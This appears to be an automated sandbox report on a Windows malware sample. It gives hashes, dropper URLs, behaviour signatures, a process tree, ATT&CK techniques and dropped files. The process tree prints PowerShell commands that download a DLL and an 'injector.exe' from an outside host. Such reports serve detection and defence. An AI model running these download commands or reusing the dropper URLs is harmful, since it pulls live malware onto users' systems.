Analysis

  • max time kernel
    151s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 23:43

General

  • Target

    b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe

  • Size

    188KB

  • MD5

    f4dc42d37d9a826db8d681bf374be307

  • SHA1

    c2c0e84809d3aa59834b54710cae5d7a2f8e82cc

  • SHA256

    b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3

  • SHA512

    81d370b010845c3b3c72f12476be6f07a259ec2b377e21674c3832a8af23bed1a25d12f2dfabd5580b3261d30c37caf7873e0baf659cc00376ad3cfed697cfb1

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://Hypnomenu.tk/Launcher/Files/Hypno.ytd

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://hypnomenu.tk/Launcher/Files/Hypno.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://Hypnomenu.tk/Launcher/Files/injector.exe

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • Executes dropped EXE 6 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe
    "C:\Users\Admin\AppData\Local\Temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4052
    • \??\c:\users\admin\appdata\local\temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe 
      c:\users\admin\appdata\local\temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe 
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4504
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A5DA.tmp\A5DB.tmp\A5DC.bat c:\users\admin\appdata\local\temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Start-BitsTransfer -Source "https://Hypnomenu.tk/Launcher/Files/Hypno.ytd" -Destination "Hypno.ytd"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Start-BitsTransfer -Source "https://hypnomenu.tk/Launcher/Files/Hypno.txt" -Destination "Hypno.dll"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3532
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Start-BitsTransfer -Source "https://Hypnomenu.tk/Launcher/Files/injector.exe" -Destination "injector.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2116
    • C:\Windows\Resources\Themes\icsys.icn.exe
      C:\Windows\Resources\Themes\icsys.icn.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4664
      • \??\c:\windows\resources\themes\explorer.exe
        c:\windows\resources\themes\explorer.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1492
        • \??\c:\windows\resources\spoolsv.exe
          c:\windows\resources\spoolsv.exe SE
          4⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:572
          • \??\c:\windows\resources\svchost.exe
            c:\windows\resources\svchost.exe
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:704
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe PR
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:3116

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Hidden Files and Directories

1
T1158

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Hidden Files and Directories

1
T1158

Modify Registry

2
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    61e2e57471d559f5f6813c0a7995c075

    SHA1

    33c621541bc0892ddab1b65345a348c14af566e5

    SHA256

    c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

    SHA512

    9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    88bd0f0481bec2086f7b9b3e64bb0767

    SHA1

    2e4e2ea77813c2530f3c061de4c54c0b9aac92cc

    SHA256

    eeb83bdf187ae3262a851d0894c25f157a57dadc246474368393533d49151bfb

    SHA512

    8e3c8a6f8dfdad4a6de2d0b4ae8ea1a24b12e3616a21372c8bd0aa40763a770bc58c7dfcfcaa1f0266e343516120c2834eaa2edef89efceedf37d2625a71b337

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    fdb96fa98ec0dd0829999fcc5678b59b

    SHA1

    49266529077de1977eb6842cf9783349f41cc68a

    SHA256

    ad73e9a4a5f4df6ce356290b1463108999453d6c900fd435e7fa8696cf1909e0

    SHA512

    0d8dfa07894f66c3c239b534747082b25b3562024f4bba9b51ee5eb8f6fe225573f4c9f6590f168c589fc136aa3f36c1faf38dc5af27ccc5ebe64ed53fca68e3

  • C:\Users\Admin\AppData\Local\Temp\A5DA.tmp\A5DB.tmp\A5DC.bat
    Filesize

    562B

    MD5

    4df5d1deac67dd7e9ece87beadece906

    SHA1

    a130aadaae20545407eca23d9dae349c3a1966aa

    SHA256

    c1684cfcd9e3461ce963e2493e83460a6f9992d6caafbc9c56f8e8db630faad9

    SHA512

    76ef78087bce1a06a38411287ce590fb31ee9e8202c1efad28aea56dcfeb6ed916775e5910abbabf80d445e5fd8c1ef1e5ef9ac660d8ab25728fdc7cb91d91f9

  • C:\Users\Admin\AppData\Local\Temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe 
    Filesize

    53KB

    MD5

    2b6825a8081f4cc942148e59195534ad

    SHA1

    550710f89682c03be3874282057b217cb627e484

    SHA256

    3a44f9158fcb1f997710266882d05d8979cf17971e594db6a8e6e811ba488ae8

    SHA512

    49474f598c24af54acdfce6767276e487d892334cea5c1536211352b4edf96f9fed4d3b9af9dec20b0813c8376ce9eda019c655b30bd2253c5cba71eaa6e29a6

  • C:\Windows\Resources\Themes\explorer.exe
    Filesize

    135KB

    MD5

    573f73f372c340cfea56efbafcafe90a

    SHA1

    a92af1eff3422ec60c1f339385228abd442636a2

    SHA256

    375d0c931411b4d12e22c790895b831f91119f29d9abac269d4e3da72925e423

    SHA512

    d0dd982ba7213baa46df939b8efc25bc4336232b8d239af8fcd93741b60656ef3c8a4091aaba7454b342410328fb6ff7b9ae24802079b1ea79e38dbec394bd52

  • C:\Windows\Resources\Themes\icsys.icn.exe
    Filesize

    135KB

    MD5

    261f9cafeb34f877302426d0b517e478

    SHA1

    8612f557cc2d090bf45459d8d5f3908538909a83

    SHA256

    7287f8d7b7eb7babeb07d764ba7a66b768d7829232640aeee73155598e88f500

    SHA512

    5f05155deb56a5c8ba6f21031584be08db9f5ffc453e9d2d30581a93c5fe3cf28835e9e3749aaa83f5081daec3c6ebf6211e1f889b751fc58f4117ae7d2d96e3

  • C:\Windows\Resources\Themes\icsys.icn.exe
    Filesize

    135KB

    MD5

    261f9cafeb34f877302426d0b517e478

    SHA1

    8612f557cc2d090bf45459d8d5f3908538909a83

    SHA256

    7287f8d7b7eb7babeb07d764ba7a66b768d7829232640aeee73155598e88f500

    SHA512

    5f05155deb56a5c8ba6f21031584be08db9f5ffc453e9d2d30581a93c5fe3cf28835e9e3749aaa83f5081daec3c6ebf6211e1f889b751fc58f4117ae7d2d96e3

  • C:\Windows\Resources\spoolsv.exe
    Filesize

    135KB

    MD5

    644ce34d0577606fe99e8cfb26220673

    SHA1

    6579b69bbe0f7c9d0c6e4514cac3409bdd82773e

    SHA256

    1a8823d0753844e8daa4f14dda589f1880d4b5d3a8bac62a22acc3a7c66a420c

    SHA512

    018392c5b2803a290113529c576fe6fa56cefb94210a75eaea0fb6821d97edc134de03e93ef542533ae487dff8c07835342b0d4079aefe2927fd3ff3c776427a

  • C:\Windows\Resources\spoolsv.exe
    Filesize

    135KB

    MD5

    644ce34d0577606fe99e8cfb26220673

    SHA1

    6579b69bbe0f7c9d0c6e4514cac3409bdd82773e

    SHA256

    1a8823d0753844e8daa4f14dda589f1880d4b5d3a8bac62a22acc3a7c66a420c

    SHA512

    018392c5b2803a290113529c576fe6fa56cefb94210a75eaea0fb6821d97edc134de03e93ef542533ae487dff8c07835342b0d4079aefe2927fd3ff3c776427a

  • C:\Windows\Resources\svchost.exe
    Filesize

    135KB

    MD5

    25961990824768152ff16e7d7145bce3

    SHA1

    ef6abd0c9c19cdb09a149ae3dfe5be3c5c4e7d61

    SHA256

    6630ad0ae28f771d521d786268847d2851493ecea72e742dfbd3f7d0a56127d4

    SHA512

    67eb0b11bf665a80503d17a55a76794b56900e61e466b38cc25473ad3b0dc382e357f3e44f2f29501053019753b8ce1d85eefe45a1c5c2ce0f1d7b2df35a70ef

  • \??\c:\users\admin\appdata\local\temp\b082dc100bcebcfc094c530ad92136e1c4ccc037876e9805e09d697b8d8c7fd3.exe 
    Filesize

    53KB

    MD5

    2b6825a8081f4cc942148e59195534ad

    SHA1

    550710f89682c03be3874282057b217cb627e484

    SHA256

    3a44f9158fcb1f997710266882d05d8979cf17971e594db6a8e6e811ba488ae8

    SHA512

    49474f598c24af54acdfce6767276e487d892334cea5c1536211352b4edf96f9fed4d3b9af9dec20b0813c8376ce9eda019c655b30bd2253c5cba71eaa6e29a6

  • \??\c:\windows\resources\spoolsv.exe
    Filesize

    135KB

    MD5

    644ce34d0577606fe99e8cfb26220673

    SHA1

    6579b69bbe0f7c9d0c6e4514cac3409bdd82773e

    SHA256

    1a8823d0753844e8daa4f14dda589f1880d4b5d3a8bac62a22acc3a7c66a420c

    SHA512

    018392c5b2803a290113529c576fe6fa56cefb94210a75eaea0fb6821d97edc134de03e93ef542533ae487dff8c07835342b0d4079aefe2927fd3ff3c776427a

  • \??\c:\windows\resources\svchost.exe
    Filesize

    135KB

    MD5

    25961990824768152ff16e7d7145bce3

    SHA1

    ef6abd0c9c19cdb09a149ae3dfe5be3c5c4e7d61

    SHA256

    6630ad0ae28f771d521d786268847d2851493ecea72e742dfbd3f7d0a56127d4

    SHA512

    67eb0b11bf665a80503d17a55a76794b56900e61e466b38cc25473ad3b0dc382e357f3e44f2f29501053019753b8ce1d85eefe45a1c5c2ce0f1d7b2df35a70ef

  • \??\c:\windows\resources\themes\explorer.exe
    Filesize

    135KB

    MD5

    573f73f372c340cfea56efbafcafe90a

    SHA1

    a92af1eff3422ec60c1f339385228abd442636a2

    SHA256

    375d0c931411b4d12e22c790895b831f91119f29d9abac269d4e3da72925e423

    SHA512

    d0dd982ba7213baa46df939b8efc25bc4336232b8d239af8fcd93741b60656ef3c8a4091aaba7454b342410328fb6ff7b9ae24802079b1ea79e38dbec394bd52

  • memory/572-150-0x0000000000000000-mapping.dmp
  • memory/572-170-0x0000000000400000-0x000000000041F000-memory.dmp
    Filesize

    124KB

  • memory/704-157-0x0000000000000000-mapping.dmp
  • memory/724-156-0x0000000000000000-mapping.dmp
  • memory/724-163-0x00000279A8E70000-0x00000279A8E92000-memory.dmp
    Filesize

    136KB

  • memory/724-174-0x00007FF822A90000-0x00007FF823551000-memory.dmp
    Filesize

    10.8MB

  • memory/724-173-0x00000279A9D80000-0x00000279A9D94000-memory.dmp
    Filesize

    80KB

  • memory/1492-144-0x0000000000000000-mapping.dmp
  • memory/1492-182-0x0000000000400000-0x000000000041F000-memory.dmp
    Filesize

    124KB

  • memory/2116-179-0x0000000000000000-mapping.dmp
  • memory/2116-181-0x00007FF822A90000-0x00007FF823551000-memory.dmp
    Filesize

    10.8MB

  • memory/3032-141-0x0000000000000000-mapping.dmp
  • memory/3116-169-0x0000000000400000-0x000000000041F000-memory.dmp
    Filesize

    124KB

  • memory/3116-164-0x0000000000000000-mapping.dmp
  • memory/3532-175-0x0000000000000000-mapping.dmp
  • memory/3532-178-0x00007FF822A90000-0x00007FF823551000-memory.dmp
    Filesize

    10.8MB

  • memory/4052-172-0x0000000000400000-0x000000000041F000-memory.dmp
    Filesize

    124KB

  • memory/4504-133-0x0000000000000000-mapping.dmp
  • memory/4664-171-0x0000000000400000-0x000000000041F000-memory.dmp
    Filesize

    124KB

  • memory/4664-136-0x0000000000000000-mapping.dmp